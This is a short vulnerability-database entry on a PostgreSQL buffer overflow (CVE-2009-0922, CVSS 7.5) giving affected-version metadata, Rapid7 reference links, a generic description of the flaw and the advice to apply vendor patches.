Vendor: PostgreSQL
By: Unknown
CVSS: 7.5 (HIGH)
Buffer Overflow
CWE: 119
Product Name: PostgreSQL
Affected Version From: 8.0.23
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2009-0922
CPE: a:postgresql:postgresql:8.0.23
Metasploit:
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1484/
https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2009-1067/
https://www.rapid7.com/db/vulnerabilities/centos_linux-cve-2009-0922/
https://www.rapid7.com/db/vulnerabilities/postgres-cve-2009-0922/
https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-0922/
https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-0922/
Platforms Tested: Unknown
PostgreSQL Buffer Overflow Vulnerability
PostgreSQL is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code with elevated privileges or crash the affected application.
Mitigation:
Apply the latest security patches provided by the vendor.